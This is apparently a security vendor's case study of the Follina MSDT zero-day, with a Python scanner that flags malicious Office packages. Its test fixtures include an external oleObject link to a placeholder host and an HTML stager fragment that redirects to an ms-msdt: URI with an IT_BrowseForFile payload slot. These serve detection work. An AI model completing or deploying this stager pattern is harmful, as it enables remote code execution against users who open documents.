The MSDT “Follina” zero‑day (CVE‑2022‑30190) emerged as a high‑severity exploitation vector in which attackers weaponised Microsoft Office documents to execute code through the Microsoft Support Diagnostic Tool (msdt.exe). The document carried an external OLE object relationship that fetched an attacker‑controlled HTML page, which redirected to an ms‑msdt: URI whose parameters were executed by the diagnostic tool. No macros were required, so macro‑blocking policies did not help, and the chain triggered when a user opened the file or, for RTF variants, merely previewed it in the Explorer preview pane. Microsoft published guidance and a workaround on 30 May 2022 and shipped a fix in the June 2022 security updates.
Threat campaigns leveraged invoice‑themed lures, tender documents, HR files, and government‑style templates to compromise government agencies, enterprises, and other high‑value targets. Once the chain fired, it delivered C2 beacons, credential‑harvesting payloads, and loaders that established persistent footholds within corporate environments.
Athenian Tech’s Role
Athenian Tech’s Prime intelligence platform played a central role in detecting and containing live exploitation attempts. The platform did the following:
- Identified concentrated clusters of malicious Office documents and exploit‑linked URLs across email, web, and endpoint telemetry.
- Correlated hashes, domains, URLs, and C2 infrastructure with Dark Web exploit‑kit sellers and underground operator chatter.
- Issued rapid‑response advisories recommending disablement of the MSDT URL handler (Microsoft’s published workaround: back up and then delete the HKEY_CLASSES_ROOT\ms-msdt registry key), EDR detections for Office processes spawning msdt.exe, IOC blocks, and emergency patching across client environments.
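To make the detection concrete, the following Python scanner is an added example and not Athenian Tech’s own detection logic or code from the Prime platform. It checks a .docx for the two markers of the Follina delivery pattern described above: an oleObject relationship in the package’s .rels files with TargetMode="External" pointing at a remote URL, and any ms‑msdt: URI or IT_BrowseForFile= parameter in the package contents. The sample documents and the HTML stager fragment are constructed for the example (the host example.invalid is a placeholder), and the heuristic itself is an assumption about what is worth flagging, not a vendor rule.

```python
"""Scan Office Open XML packages for the Follina (CVE-2022-30190) delivery pattern.

Detection heuristic (assumption, illustrative only): flag an oleObject relationship
that is external and points at an http/https/file/UNC target, and flag any
ms-msdt: URI or IT_BrowseForFile= parameter found inside the package.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
MSDT_URI = re.compile(r"ms-msdt:/?id\s+\S+", re.IGNORECASE)
MSDT_PARAM = re.compile(r"IT_BrowseForFile=", re.IGNORECASE)

# Constructed sample inputs (not real campaign artifacts).
BENIGN_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="%s" Target="embeddings/oleObject1.bin"/>'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/hyperlink" Target="https://example.invalid/" TargetMode="External"/>'
    "</Relationships>" % OLE_REL
)
# Follina-style: external oleObject pointing at a remote HTML stager; observed
# samples often terminated the URL with a trailing "!".
SUSPECT_RELS = (
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="%s" Target="http://example.invalid/stage.html!" '
    'TargetMode="External"/>'
    "</Relationships>" % OLE_REL
)
# Stager shape: a redirect to an ms-msdt: URI; the payload part is a placeholder.
SAMPLE_HTML = (
    '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu '
    'IT_BrowseForFile=$(PLACEHOLDER)\\"";</script>'
)


def build_docx(rels_xml: str, document_xml: str = "<w:document/>") -> bytes:
    """Build a minimal .docx (a zip package) from a rels file and a body."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def external_ole_targets(docx_bytes: bytes) -> list:
    """Return targets of external oleObject relationships pointing off-document."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("Type") != OLE_REL:
                    continue
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(("http://", "https://", "file://", "\\\\")):
                    hits.append(target)
    return hits


def find_msdt_uri(text: str) -> bool:
    """True if the text carries an ms-msdt: URI or the IT_BrowseForFile parameter."""
    return bool(MSDT_URI.search(text) or MSDT_PARAM.search(text))


def scan_docx(docx_bytes: bytes) -> list:
    """Collect human-readable findings for one package; empty list means clean."""
    findings = ["external oleObject relationship -> " + t
                for t in external_ole_targets(docx_bytes)]
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if find_msdt_uri(z.read(name).decode("utf-8", errors="ignore")):
                findings.append("ms-msdt URI in " + name)
    return findings


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspect", SUSPECT_RELS)):
        print(label, scan_docx(build_docx(rels)) or "clean")
    print("stager html:", "flagged" if find_msdt_uri(SAMPLE_HTML) else "clean")
```

The relationship check runs over every .rels part in the package, not only word/_rels/document.xml.rels, so the same function covers Excel and PowerPoint packages; the ms‑msdt: check is useful on the fetched HTML stage as well, which is where the URI actually lives in the original chain.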
Impact
Athenian Tech’s intervention led to:
- Disruption of active Follina attack chains before lateral movement or credential compromise could escalate.
- Significantly reduced mean time to detect (MTTD) and mean time to respond (MTTR) for affected organisations during the zero‑day window.
- Updated hardening baselines and response playbooks in client enterprises, covering future zero‑days that abuse Office URL and protocol handlers.

